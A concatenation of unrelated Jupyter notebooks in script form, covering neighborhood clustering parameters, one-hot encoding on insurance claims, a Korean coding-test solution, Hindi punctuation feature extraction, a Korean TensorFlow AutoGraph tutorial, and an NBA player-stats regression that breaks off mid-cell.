'years': [1980, 1990, 2000, 2010], # Available years: 1970, 1980, 1990, 2000 and 2010
'method': "kmeans", # affinity_propagation, gaussian_mixture, hdbscan, kmeans, spectral, ward
'nClusters': 8, # This option should be commented out for affinity_propagation and hdbscan
'variables': ["p_nonhisp_white_persons",
"p_nonhisp_black_persons",
"p_hispanic_persons",
"p_native_persons",
"p_asian_persons",
],
'Sequence': False,
# optional visualization below.
#'Index_of_neighborhood_change': True, #choropleth map: Maps representing index of neighborhood Change
'Maps_of_neighborhood': True, #choropleth map: Maps representing clustering result
#'Distribution_INC1': True, #density chart: INC changes as the map extent changes
#'Distribution_INC2_different_period': True, #density chart: INC changes by different years
#'Distribution_INC2_different_cluster': True, #density chart: INC changes by different clusters
'Temporal_change_in_neighborhoods': True, #stacked chart: Temporal Change in Neighborhoods over years
#'Parallel_Categories_Diagram_in_neighborhoods': True,
#'Chord_Diagram_in_neighborhoods': True,
}
Aspatial_Clustering_viz(param)
Aspatial_Clustering_log()
|
Categorical_Data_Vis/.ipynb_checkpoints/GEOSNAP2NAM1-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# load libraries
import numpy as np
import pandas as pd
from sklearn.preprocessing import OneHotEncoder
from sklearn.model_selection import train_test_split
from sklearn.model_selection import cross_val_score
from sklearn.tree import DecisionTreeRegressor
# -
df = pd.read_csv('insurance_claims.csv')
df.columns
df.dtypes
df.head()
df.describe(include='all')
# ## One hot encoding
df_1 = df.drop(['CustomerID','TotalClaimAmount'], axis=1)
one_hot_encoded_training_predictors = pd.get_dummies(df_1)
one_hot_encoded_training_predictors
# Mean Absolute Error (MAE)
def get_mae(X, y):
# multiple by -1 to make positive MAE score
# instead of neg value returned as sklearn convention
return -1 * cross_val_score(DecisionTreeRegressor(random_state=131),
X, y, scoring = 'neg_mean_absolute_error').mean()
predictors_without_categoricals = df_1.select_dtypes(exclude=['object'])
predictors_without_categoricals
target = df['TotalClaimAmount']
mae_without_categoricals = get_mae(predictors_without_categoricals, target)
mae_without_categoricals
mae_one_hot_encoded = get_mae(one_hot_encoded_training_predictors, target)
mae_one_hot_encoded
print('Mean Absolute Error when Dropping Categoricals: ' + str(int(mae_without_categoricals)))
print('Mean Abslute Error with One-Hot Encoding: ' + str(int(mae_one_hot_encoded)))
df_1 = one_hot_encoded_training_predictors
features = list(df_1.columns)
features
|
projects/predictions/ml_python_onehotencoding_1.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## 2021년 6월 7일 월요일
# ### Programmers - 2개 이하로 다른 비트 (Python)
# ### 문제 : https://programmers.co.kr/learn/courses/30/lessons/77885
# ### 블로그 : https://somjang.tistory.com/entry/Programmers-2%EA%B0%9C-%EC%9D%B4%ED%95%98%EB%A1%9C-%EB%8B%A4%EB%A5%B8-%EB%B9%84%ED%8A%B8-Python
# ### Solution
def solution(numbers):
answer = []
for number in numbers:
if number % 2 == 0:
binary_num = list(bin(number)[2:])
binary_num[-1] = "1"
else:
binary_num = bin(number)[2:]
binary_num = "0" + binary_num
one_idx = binary_num.rfind("0")
binary_num = list(binary_num)
binary_num[one_idx] = "1"
binary_num[one_idx + 1] = "0"
ans_num = int("".join(binary_num), 2)
answer.append(ans_num)
return answer
|
DAY 301 ~ 400/DAY388_[Programmers] 2개 이하로 다른 비트 (Python).ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import pickle
import nltk
files = ["bhairav", "dharamveer", "premchand", "sharatchandra", "vibhooti"]
piece_frequencies = []
piece_author = []
for file_name in files:
pickle_file = open("../pickles/author_splits/" + file_name + ".pkl" , "rb")
split_text = pickle.load(pickle_file)
pickle_file.close()
for text in split_text:
punctuation_frequency = [0] * 11
punctuation_frequency[0] = text.count('।')
punctuation_frequency[1] = text.count('.')
punctuation_frequency[2] = text.count(',')
punctuation_frequency[3] = text.count(':')
punctuation_frequency[4] = text.count(';')
punctuation_frequency[5] = text.count('?')
punctuation_frequency[6] = text.count('!')
punctuation_frequency[7] = text.count('-')
punctuation_frequency[8] = text.count("’")
punctuation_frequency[9] = text.count("'")
punctuation_frequency[10] = text.count('"')
piece_frequencies.append(punctuation_frequency)
piece_author.append(file_name)
feature_vector = [piece_author, piece_frequencies]
# -
pickle_file = open("../pickles/feature_vectors/punctuation/punctuation.pkl" , "wb")
pickle.dump(feature_vector, pickle_file)
pickle_file.close()
|
feature_extraction/punctuation_frequencies.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] colab_type="text" id="Jxv6goXm7oGF"
# ##### Copyright 2018 The TensorFlow Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# + colab_type="code" id="llMNufAK7nfK" colab={}
#@title Licensed under the Apache License, Version 2.0 (the "License"); { display-mode: "form" }
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# + [markdown] colab_type="text" id="8Byow2J6LaPl"
# # 텐서플로 2.0의 tf.function과 오토그래프 (AutoGraph)
# + [markdown] colab_type="text" id="kGXS3UWBBNoc"
# <table class="tfo-notebook-buttons" align="left">
# <td>
# <a target="_blank" href="https://www.tensorflow.org/beta/guide/autograph"><img src="https://www.tensorflow.org/images/tf_logo_32px.png" />TensorFlow.org 에서 보기</a>
# </td>
# <td>
# <a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs/blob/master/site/ko/beta/guide/autograph.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />구글 코랩(Google Colab)에서 실행하기</a>
# </td>
# <td>
# <a target="_blank" href="https://github.com/tensorflow/docs/blob/master/site/ko/beta/guide/autograph.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />깃헙(GitHub) 소스 보기</a>
# </td>
# </table>
# + [markdown] id="GQLxpmF2_AvM" colab_type="text"
# Note: 이 문서는 텐서플로 커뮤니티에서 번역했습니다. 커뮤니티 번역 활동의 특성상 정확한 번역과 최신 내용을 반영하기 위해 노력함에도
# 불구하고 [공식 영문 문서](https://www.tensorflow.org/?hl=en)의 내용과 일치하지 않을 수 있습니다.
# 이 번역에 개선할 부분이 있다면
# [tensorflow/docs](https://github.com/tensorflow/docs) 깃헙 저장소로 풀 리퀘스트를 보내주시기 바랍니다.
# 문서 번역이나 리뷰에 참여하려면
# [<EMAIL>](https://groups.google.com/a/tensorflow.org/forum/#!forum/docs-ko)로
# 메일을 보내주시기 바랍니다.
# + [markdown] colab_type="text" id="CydFK2CL7ZHA"
# TF 2.0 버전은 즉시 실행 (eager execution)의 편리함과 TF 1.0의 성능을 합쳤습니다. 이러한 결합의 중심에는 `tf.function` 이 있는데, 이는 파이썬 문법의 일부를 이식 가능하고 높은 성능의 텐서플로 그래프 코드로 변환시켜줍니다.
#
# `tf.function`의 멋지고 새로운 특징은 오토그래프 (AutoGraph)입니다. 이는 자연스러운 파이썬 문법을 활용해서 그래프 코드를 작성할 수 있도록 돕습니다. 오토그래프로 사용할 수 있는 파이썬 특징들의 목록을 보려면 [오토그래프 지원 범위](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/autograph/LIMITATIONS.md)를 참고하세요. `tf.function`에 관한 더 자세한 내용을 확인하려면 RFC [TF 2.0: Functions, not Sessions](https://github.com/tensorflow/community/blob/master/rfcs/20180918-functions-not-sessions-20.md)을 참고하세요. 오토그래프에 대한 더 자세한 내용은 `tf.autograph`를 참고하세요.
#
# 본 튜토리얼은 `tf.function`와 오토그래프의 기초적인 특징에 대해서 설명할 것입니다.
# + [markdown] colab_type="text" id="n4EKOpw9mObL"
# ## 설정
#
# 텐서플로 2.0 프리뷰 나이틀리 (Preview Nightly) 버전을 임포트(import)하고, TF 2.0 모드를 설정합니다:
# + colab_type="code" id="V9oECvVSI1Kj" colab={}
from __future__ import absolute_import, division, print_function, unicode_literals
import numpy as np
# + colab_type="code" id="mT7meGqrZTz9" colab={}
# !pip install tensorflow==2.0.0-beta1
import tensorflow as tf
# + [markdown] colab_type="text" id="77AsVr1GGtBP"
# ## `tf.function` 데코레이터
#
# `tf.function`을 함수에 붙여줄 경우, 여전히 다른 일반 함수들처럼 사용할 수 있습니다. 하지만 그래프 내에서 컴파일 되었을 때는 더 빠르게 실행하고, GPU나 TPU를 사용해서 작동하고, 세이브드모델(SavedModel)로 내보내는 것이 가능해집니다.
# + colab_type="code" id="FhIg7-z6HNWj" colab={}
@tf.function
def simple_nn_layer(x, y):
return tf.nn.relu(tf.matmul(x, y))
x = tf.random.uniform((3, 3))
y = tf.random.uniform((3, 3))
simple_nn_layer(x, y)
# + [markdown] colab_type="text" id="U-LAE4pMNR9g"
# 데코레이터를 붙인 결과를 확인해보면, 텐서플로 런타임시의 모든 상호작용들을 다룰 수 있다는 것을 알 수 있습니다.
# + colab_type="code" id="q4t2iuS7Nqc0" colab={}
simple_nn_layer
# + [markdown] colab_type="text" id="DqeefLGNXjZQ"
# 만일 여러분의 코드가 여러 함수들을 포함하고 있다면, 그것들에 모두 데코레이터를 붙일 필요는 없습니다. 데코레이터가 붙은 함수로부터 호출된 모든 함수들은 그래프 모드에서 동작합니다.
# + colab_type="code" id="3VGF7tlVXiZY" colab={}
def linear_layer(x):
return 2 * x + 1
@tf.function
def deep_net(x):
return tf.nn.relu(linear_layer(x))
deep_net(tf.constant((1, 2, 3)))
# + [markdown] colab_type="text" id="yQvg6ZSKWyqE"
# 작은 연산들을 많이 포함한 그래프의 경우 함수들은 즉시 실행 코드 (eager code) 보다 더 빠르게 동작합니다. 하지만 무거운 연산들을 조금 포함한 그래프의 경우 (컨볼루션 등), 그렇게 빠른 속도 향상은 기대하기 어렵습니다.
#
# + colab_type="code" id="0EL6lVwEWuFo" colab={}
import timeit
conv_layer = tf.keras.layers.Conv2D(100, 3)
@tf.function
def conv_fn(image):
return conv_layer(image)
image = tf.zeros([1, 200, 200, 100])
# 데이터 준비 (warm up)
conv_layer(image); conv_fn(image)
print("컨볼루션 즉시 실행:", timeit.timeit(lambda: conv_layer(image), number=10))
print("컨볼루션 함수:", timeit.timeit(lambda: conv_fn(image), number=10))
print("컨볼루션의 성능에는 큰 차이가 없다는 것을 확인할 수 있습니다")
# + colab_type="code" id="L4zj-jpH0jKH" colab={}
lstm_cell = tf.keras.layers.LSTMCell(10)
@tf.function
def lstm_fn(input, state):
return lstm_cell(input, state)
input = tf.zeros([10, 10])
state = [tf.zeros([10, 10])] * 2
# 데이터 준비 (warm up)
lstm_cell(input, state); lstm_fn(input, state)
print("lstm 즉시 실행:", timeit.timeit(lambda: lstm_cell(input, state), number=10))
print("lstm 함수:", timeit.timeit(lambda: lstm_fn(input, state), number=10))
# + [markdown] colab_type="text" id="ohbSnA79mcJV"
# ## 파이썬의 제어 흐름 사용하기
#
# `tf.function` 내에서 데이터 기반 제어 흐름을 사용할 때, 파이썬의 제어 흐름 문을 사용할 수 있고, 오토그래프 기능은 그것들을 모두 적절한 텐서플로 연산으로 변환할 수 있습니다. 예를 들어, `if` 문은 `Tensor`를 기반으로 작동해야할 때 `tf.cond()` 로 변환될 수 있습니다.
#
# 아래 예시에서, `x`는 `Tensor`이지만 `if`문이 예상한대로 정상 작동합니다:
# + colab_type="code" id="aA3gOodCBkOw" colab={}
@tf.function
def square_if_positive(x):
if x > 0:
x = x * x
else:
x = 0
return x
print('square_if_positive(2) = {}'.format(square_if_positive(tf.constant(2))))
print('square_if_positive(-2) = {}'.format(square_if_positive(tf.constant(-2))))
# + [markdown] colab_type="text" id="GMiCUkdyoq98"
# Note: 위의 예시는 스칼라값으로 간단한 조건절을 사용하였습니다. 하지만 실제 코드에서는 <a href="#batching">배치(Batching)</a> 가 주로 사용됩니다.
# + [markdown] colab_type="text" id="m-jWmsCmByyw"
# 오토그래프는 기본적인 파이썬 문인 `while`, `for`, `if`, `break`, `continue`, `return`과 네스팅(nesting)을 지원합니다. 이는 `Tensor` 표현을 `while`과 `if` 문의 조건 부분에서 사용하거나 `for` 루프에서 `Tensor`를 반복할 수 있다는 것을 의미합니다.
# + colab_type="code" id="toxKBOXbB1ro" colab={}
@tf.function
def sum_even(items):
s = 0
for c in items:
if c % 2 > 0:
continue
s += c
return s
sum_even(tf.constant([10, 12, 15, 20]))
# + [markdown] colab_type="text" id="AtDaLrbySw4j"
# 또한 오토그래프는 고급 사용자를 위해 낮은 수준의 API를 제공합니다. 예를 들어, 여러분은 생성된 코드를 확인하기 위해 다음과 같이 작성할 수 있습니다.
# + colab_type="code" id="aRsde3x_SjTQ" colab={}
print(tf.autograph.to_code(sum_even.python_function))
# + [markdown] colab_type="text" id="rvJXCfk8VkLf"
# 다음은 더 복잡한 제어 흐름의 예시입니다:
# + colab_type="code" id="h-Z87IJqVlKl" colab={}
@tf.function
def fizzbuzz(n):
msg = tf.constant('')
for i in tf.range(n):
if tf.equal(i % 3, 0):
tf.print('Fizz')
elif tf.equal(i % 5, 0):
tf.print('Buzz')
else:
tf.print(i)
fizzbuzz(tf.constant(15))
# + [markdown] colab_type="text" id="h_Y4uC1R1B55"
# ## 케라스와 오토그래프
#
# 오토그래프는 기본적으로 비동적(non-dynamic) 케라스 모델에서 사용 가능합니다. 더 자세한 정보를 원한다면, `tf.keras`를 참고하세요.
# + colab_type="code" id="cR6mpLKP1HLe" colab={}
class CustomModel(tf.keras.models.Model):
@tf.function
def call(self, input_data):
if tf.reduce_mean(input_data) > 0:
return input_data
else:
return input_data // 2
model = CustomModel()
model(tf.constant([-2, -4]))
# + [markdown] colab_type="text" id="NTEvpBK9f8kj"
# ## 부수 효과 (Side effects)
#
# 즉시 실행 모드 (eager mode)처럼 부수 효과를 사용할 수 있습니다. 예를 들면, `tf.function` 내에 있는 `tf.assign`이나 `tf.print`이 있습니다. 또한 부수 효과들은 작업들이 순서대로 실행된다는 것을 보장하기 위해 필수적인 제어 의존성 (control dependency)을 추가합니다.
# + colab_type="code" id="-Wd6i8S9gcuC" colab={}
v = tf.Variable(5)
@tf.function
def find_next_odd():
v.assign(v + 1)
if tf.equal(v % 2, 0):
v.assign(v + 1)
find_next_odd()
v
# + [markdown] colab_type="text" id="4LfnJjm0Bm0B"
# ## 디버깅
#
# `tf.function` 과 오토그래프는 코드를 생성하고 텐서플로 그래프 내에서 해당 코드를 추적함으로써 동작합니다. 이 메커니즘은 아직까지는 `pdb`같은 단계적 (step-by-step) 디버거를 지원하지 않습니다. 하지만 일시적으로 `tf.function` 내에서 즉시 실행 (eager execution)을 가능하게 하는 `tf.config.run_functions_eagerly(True)`을 사용하고 가장 선호하는 디버거를 사용할 수 있습니다:
# + colab_type="code" id="Yci8ve6hmgpF" colab={}
@tf.function
def f(x):
if x > 0:
# 여기에 중단점(breakpoint)을 설정해 보세요!
# 예시:
# import pdb
# pdb.set_trace()
x = x + 1
return x
tf.config.experimental_run_functions_eagerly(True)
# 이제 중단점을 설정하고 디버거 내에서 코드를 실행할 수 있습니다.
f(tf.constant(1))
tf.config.experimental_run_functions_eagerly(False)
# + [markdown] colab_type="text" id="Em5dzSUOtLRP"
# ### 데이터 다운로드
# + colab_type="code" id="xqoxumv0ssQW" colab={}
def prepare_mnist_features_and_labels(x, y):
x = tf.cast(x, tf.float32) / 255.0
y = tf.cast(y, tf.int64)
return x, y
def mnist_dataset():
(x, y), _ = tf.keras.datasets.mnist.load_data()
ds = tf.data.Dataset.from_tensor_slices((x, y))
ds = ds.map(prepare_mnist_features_and_labels)
ds = ds.take(20000).shuffle(20000).batch(100)
return ds
train_dataset = mnist_dataset()
# + [markdown] colab_type="text" id="znmy4l8ntMvW"
# ### 모델 정의하기
# + colab_type="code" id="ltxyJVWTqNAO" colab={}
model = tf.keras.Sequential((
tf.keras.layers.Reshape(target_shape=(28 * 28,), input_shape=(28, 28)),
tf.keras.layers.Dense(100, activation='relu'),
tf.keras.layers.Dense(100, activation='relu'),
tf.keras.layers.Dense(10)))
model.build()
optimizer = tf.keras.optimizers.Adam()
# + [markdown] colab_type="text" id="oeYV6mKnJGMr"
# ### 훈련 (training) 루프 정의하기
# + colab_type="code" id="3xtg_MMhJETd" colab={}
compute_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)
compute_accuracy = tf.keras.metrics.SparseCategoricalAccuracy()
def train_one_step(model, optimizer, x, y):
with tf.GradientTape() as tape:
logits = model(x)
loss = compute_loss(y, logits)
grads = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(grads, model.trainable_variables))
compute_accuracy(y, logits)
return loss
@tf.function
def train(model, optimizer):
train_ds = mnist_dataset()
step = 0
loss = 0.0
accuracy = 0.0
for x, y in train_ds:
step += 1
loss = train_one_step(model, optimizer, x, y)
if tf.equal(step % 10, 0):
tf.print('스텝', step, ': 손실', loss, '; 정확도', compute_accuracy.result())
return step, loss, accuracy
step, loss, accuracy = train(model, optimizer)
print('최종 스텝', step, ': 손실', loss, '; 정확도', compute_accuracy.result())
# + [markdown] colab_type="text" id="SnsumiP6eRYL"
# ## 배치 (Batching)
#
# 실제 적용시에 배치 (batch) 는 성능을 위해 필수적입니다. 오토그래프로 변환하기 가장 좋은 코드는 제어 흐름이 _배치_ 수준에서 결정되는 코드입니다. 만일 제어 흐름이 개별적인 _예제 (example)_ 수준에서 결정된다면, 성능을 유지하기 위해서 배치 API들을 사용해야합니다.
#
# 예를 들어, 파이썬으로 다음과 같은 코드를 작성했다면:
#
# + colab_type="code" id="t31QoERiNccJ" colab={}
def square_if_positive(x):
return [i ** 2 if i > 0 else i for i in x]
square_if_positive(range(-5, 5))
# + [markdown] colab_type="text" id="kSeEJ76uNgwD"
# 텐서플로에서는 다음과 같이 작성하고 싶을 것입니다. (그리고 다음 코드는 실제로 동작합니다!):
#
# + colab_type="code" id="RqR8WzSzNf87" colab={}
@tf.function
def square_if_positive_naive(x):
result = tf.TensorArray(tf.int32, size=x.shape[0])
for i in tf.range(x.shape[0]):
if x[i] > 0:
result = result.write(i, x[i] ** 2)
else:
result = result.write(i, x[i])
return result.stack()
square_if_positive_naive(tf.range(-5, 5))
# + [markdown] colab_type="text" id="gTcyWXVGN3gS"
# 하지만 이 경우는 아래와 같이 작성할 수도 있습니다:
#
# + colab_type="code" id="VO2f6x-lNfVj" colab={}
def square_if_positive_vectorized(x):
return tf.where(x > 0, x ** 2, x)
square_if_positive_vectorized(tf.range(-5, 5))
|
site/ko/guide/autograph.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Libraries
# +
# %matplotlib inline
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
# Dependencies and Setup
import time
from pprint import pprint
import requests
from datetime import date, timedelta, datetime
import json
from pprint import pprint
from tqdm import tqdm
from tqdm import tqdm_notebook
# sqlite Dependencies
# ----------------------------------
# Imports the method used for connecting to DBs
from sqlalchemy import create_engine
# Allow us to declare column types
from sqlalchemy import Column, Integer, String, Text, DateTime, Float, Boolean, ForeignKey
from sqlalchemy.orm import relationship
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import Session
import seaborn as sb
# -
from nba_api.stats.endpoints import playercareerstats, drafthistory, commonplayerinfo, playerawards
# -------------
# ## Open combined data from json
with open('./clean_combined_data_for_ml.json') as json_file:
data = json.load(json_file)
# Default DF. Do not touch.
default = pd.read_json(data).copy()
# Player positions
all_stars = pd.read_csv('../../datasets/NBA_All_Stars_1996-2018.csv')
all_stars = all_stars[['Year','PLAYER','PIE','Selected?']]
all_stars = all_stars.rename(columns={'Year':'YEAR','PLAYER':'PLAYER_NAME', 'Selected?':'ALLSTAR'})
with open('./injury_formatted.json') as json_file:
injury_data = json.load(json_file)
injuries = pd.read_json(injury_data).copy()
# ## Dataframes for all positions
# #### Key:
#
# * GP: Games Played
# * MIN: Minutes Played
# * FGM: Field Goals Made
# * FGA: Field Goals Attempted
# * FG_PCT: Field Goal Percentage
# * 3PM: 3 Point Field Goals Made
# * 3PA: 3 Point Field Goals Attempted
# * FG3_PCT: 3 Point Field Goals Percentage
# * FTM: Free Throws Made
# * FTA: Free Throws Attempted
# * FT_PCT: Free Throw Percentage
# * OREB: Offensive Rebounds
# * DREB: Defensive Rebounds
# * REB: Rebounds
# * AST: Assists
# * TOV: Turnovers
# * STL: Steals
# * BLK: Blocks
# * PF: Personal Fouls
# * DD2: Double Doubles
# * TD3: Trible Doubles
# * PTS: Points
# * YIL: Year in League
#
default['YIL'].value_counts()
# +
# default
default = default[default['GP'] > 28]
# SG
# default = default[(default['POSITION'] == 'SG') & (default['GP'] > 28)]
default = default[[ 'PLAYER_ID', 'POSITION', 'PLAYER_NAME','PHOTO', 'SEASON_ID','INFLATION','YEAR', 'PLAYER_AGE','YIL','ROUND_NUMBER','OVERALL_PICK', 'GP', 'GS',
'FGM', 'FGA', 'FG_PCT', 'FG3M', 'FG3A', 'FG3_PCT', 'FTM', 'FTA',
'FT_PCT', 'OREB', 'DREB', 'REB', 'AST', 'STL', 'BLK', 'TOV', 'PF',
'PTS', 'MIN']].sort_values(by='SEASON_ID', ascending=False)
default = default.drop_duplicates(subset=['YIL','SEASON_ID','PLAYER_AGE','GP','GS','MIN'], keep='first').reset_index(drop=True)
pd.set_option('display.max_columns', None)
default = default.copy()
default
# -
default[default['PLAYER_NAME'] == "<NAME>"]
# ------------
# ### Add PER
# PER only gives positives for scoring if you shoot a decent percentage (see picture for breakeven shooting percentages). If a player scores a ton of points but shoots a very low percentage then they would not have a positive Simple PER.
#
# 'Breakeven' Shooting %: 2P = 37.5%, 3P = 28%, FT = 65%.
#
# Equation
# Simple PER is calculated as follows: (2FG Made * 2) - (2FG Attempted *.75) + (3FG Made * 3) – (3FG Attempted * .84) + (FT Made) - (FT Attempted * -.65) + Rebounds + Assists + Blocks + Steals - Turnovers.
default['PER'] = ((default['FGM'] * 2) - (default['FGA'] * .75) + (default['FG3M'] * 3) - (default['FG3A'] * .84) + (default['FTM']) - (default['FTA'] * -.65) + default['REB'] + default['AST'] + default['BLK'] + default['STL'] - default['TOV'])
default = default.sort_values(by='PER', ascending=False).reset_index(drop=True)
# +
default_merged = pd.merge(default, all_stars, how='outer', left_on=['YEAR','PLAYER_NAME'], right_on=['YEAR','PLAYER_NAME'],suffixes=('_left', '_right'))
default_merged = default_merged.drop(columns=['PIE']).dropna(thresh=7)
default_merged[default_merged['PLAYER_NAME'] == "<NAME>"]
# -
# ## Add Injuries
#
# Injuries added to second regression
# Needs Add PER ran first to complete. ^^
injuries[injuries['PLAYER_NAME'] == "<NAME>"]
# +
injuries_merged = pd.merge(default_merged, injuries, how="outer", left_on=['YEAR','PLAYER_NAME'], right_on=['Date','PLAYER_NAME'],suffixes=('_left', '_right'))
#
injuries_merged['YEAR'] = injuries_merged['YEAR'].fillna(injuries_merged['Date'])
injuries_merged = injuries_merged.drop(columns=['Date'])
injuries_merged = injuries_merged.rename(columns={"Notes":"INJURY_PY"})
# injuries_merged['INJURY_PY'] = injuries_merged['INJURY_PY']
injuries_merged = injuries_merged.dropna(thresh=5)
injuries_merged = injuries_merged.fillna(0.0)
injuries_merged
# -
# <NAME> 1629029
injuries_merged[injuries_merged['PLAYER_NAME'] == '<NAME>']
injuries_merged.columns
# +
injuries_merged = injuries_merged[['PLAYER_ID', 'POSITION', 'PLAYER_NAME', 'PHOTO', 'SEASON_ID','INFLATION',
'YEAR', 'PLAYER_AGE', 'YIL', 'ROUND_NUMBER',
'OVERALL_PICK', 'GP', 'GS', 'FGM', 'FGA', 'FG_PCT', 'FG3M', 'FG3A',
'FG3_PCT', 'FTM', 'FTA', 'FT_PCT', 'OREB', 'DREB', 'REB', 'AST', 'STL',
'BLK', 'TOV', 'PF', 'PTS', 'PER', 'ALLSTAR', 'INJURY_PY', 'MIN']]
# -
injuries_merged
## Dropping risidual due to no correlation with other featuers. Will use to verify testings.
default_rank = injuries_merged.copy()
default_rank
default_rank['ALLSTAR'] = default_rank['ALLSTAR'].fillna(0)
# Test view
default_rank[default_rank['PLAYER_NAME'] == "<NAME>okic"]
default_rank.columns
default_rank = default_rank[['PLAYER_ID', 'POSITION', 'PLAYER_NAME', 'PHOTO', 'SEASON_ID',
'INFLATION', 'YEAR', 'PLAYER_AGE', 'YIL', 'ROUND_NUMBER',
'OVERALL_PICK', 'GP', 'GS', 'FGM', 'FGA', 'FG_PCT', 'FG3M', 'FG3A',
'FG3_PCT', 'FTM', 'FTA', 'FT_PCT', 'OREB', 'DREB', 'REB', 'AST', 'STL',
'BLK', 'TOV', 'PF', 'PTS', 'PER', 'ALLSTAR', 'INJURY_PY', 'MIN']]
# ### First regression
# +
# dataset = position name
dataset = default_rank
## Multiple Linear Regressions
X = dataset.iloc[:, 8:-1].values
y = dataset.iloc[:, -1].values
# -
X[0]
## Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test,y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)
## Training the Multiple Linear Regression model on the Training set
from sklearn.linear_model import LinearRegression
regressor = LinearRegression()
regressor.fit(X_train, y_train)
## Predicting the Test set results
y_pred = regressor.predict(X_test)
np.set_printoptions(precision=2)
print(np.concatenate((y_pred.reshape(len(y_pred),1), y_test.reshape(len(y_test),1)),1))
# Multiple linear aggression is well adapted to the dataset.
## R-Square Coefficient
from sklearn.metrics import r2_score
r2_score(y_test, y_pred)
# SG: ~ 96%
# ## Input 21 col of values (X) to get minutes played.
# Each value has been passed through regressor to predict how much minutes have been played. Afterwards, we will use predicted minutes played to salary with linear regression.
# example of x passing = [5,26,64,2,120,291,0.412,40,120,0.333,69,94,0.734,17,106,123,124,70,18,53,98,349]
Prediction_result = ('Predicted Stock Index Price: ', regressor.predict(X))
Prediction_result
# Add predicts to MIN_PREDICTIONS (MIN_PRED) column for all
default_rank['MIN_PRED'] = Prediction_result[1]
default_rank['MIN_PRED'] = round(default_rank['MIN_PRED'], 2)
default_rank['RISIDUAL'] = round(default_rank['MIN_PRED']/default_rank['MIN'], 3)
# Regression 2
# ### MIN_PRED will be in a dataframe with injuries, bmi rank, all risidual rankings, PLAYER_ID, PLAYER_NAME, SEASON_ID, INFLATION
# this dataframe will run another multiple linear regression. The dependent var will be salary.
# Seperating all the data by position may not be necessary. We could possibly run this model workflow on the full dataset.
# ## Seperate by Position
# +
# default_rank = default_rank[['PLAYER_ID', 'POSITION', 'PLAYER_NAME', 'PHOTO', 'SEASON_ID',
# 'YEAR', 'YIL', 'ROUND_NUMBER',
# 'OVERALL_PICK', 'GP', 'GS', 'PER', 'ALLSTAR', 'INJURY_PY', 'MIN',
# 'MIN_PRED', 'RISIDUAL','INFLATION']]
# -
default_rank = default_rank[['PLAYER_ID', 'POSITION', 'PLAYER_NAME', 'PHOTO', 'SEASON_ID',
'YEAR', 'PLAYER_AGE', 'YIL', 'ROUND_NUMBER',
'OVERALL_PICK', 'GP', 'GS', 'FGM', 'FGA', 'FG_PCT', 'FG3M', 'FG3A',
'FG3_PCT', 'FTM', 'FTA', 'FT_PCT', 'OREB', 'DREB', 'REB', 'AST', 'STL',
'BLK', 'TOV', 'PF', 'PTS', 'PER', 'ALLSTAR', 'INJURY_PY', 'MIN',
'MIN_PRED', 'RISIDUAL','INFLATION']]
position_all = default_rank.copy()
# +
position_c = default_rank[default_rank['POSITION'] == 'C']
position_sg = default_rank[default_rank['POSITION'] == 'SG']
position_sf = default_rank[default_rank['POSITION'] == 'SF']
position_pf = default_rank[default_rank['POSITION'] == 'PF']
position_pg = default_rank[default_rank['POSITION'] == 'PG']
position_f = default_rank[default_rank['POSITION'] == 'F']
position_g = default_rank[default_rank['POSITION'] == 'G']
# + [markdown] heading_collapsed=true
# ### Position C
# + hidden=true
position_c.columns
# + hidden=true
position_c = position_c[['PLAYER_ID', 'POSITION', 'PLAYER_NAME','PHOTO', 'SEASON_ID', 'YEAR', 'YIL',
'ROUND_NUMBER', 'OVERALL_PICK', 'GP', 'GS', 'REB',
'AST', 'STL', 'PTS', 'MIN_PRED', 'PER', 'ALLSTAR', 'INJURY_PY',
'INFLATION']]
### Position C
dataset_c = position_c.dropna(thresh=3)
# 5 YIL projection on players without 5 years in the league
dataset_test_yil = position_c.dropna(thresh=3).copy()
dataset_test_yil.iloc[:, 6] = 5
x_test_yil = dataset_test_yil.iloc[:, 5:-1].values
## Multiple Linear Regressions
X = dataset_c.iloc[:, 5:-1].values
y = dataset_c.iloc[:, -1].values
# + hidden=true
# + hidden=true
## Check correlation to features
train_data = dataset_c.iloc[:, 5:]
# train_data['INFLATION'] = y
C_mat = train_data.corr()
fig = plt.figure(figsize = (15,15))
sb.heatmap(C_mat, vmax = .8, square = True)
plt.show()
# + hidden=true
## Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test,y_train, y_test = train_test_split(X, y, test_size = 0.20, random_state = 50)
# + hidden=true
## Training the Multiple Linear Regression model on the Training set
from sklearn.linear_model import LinearRegression
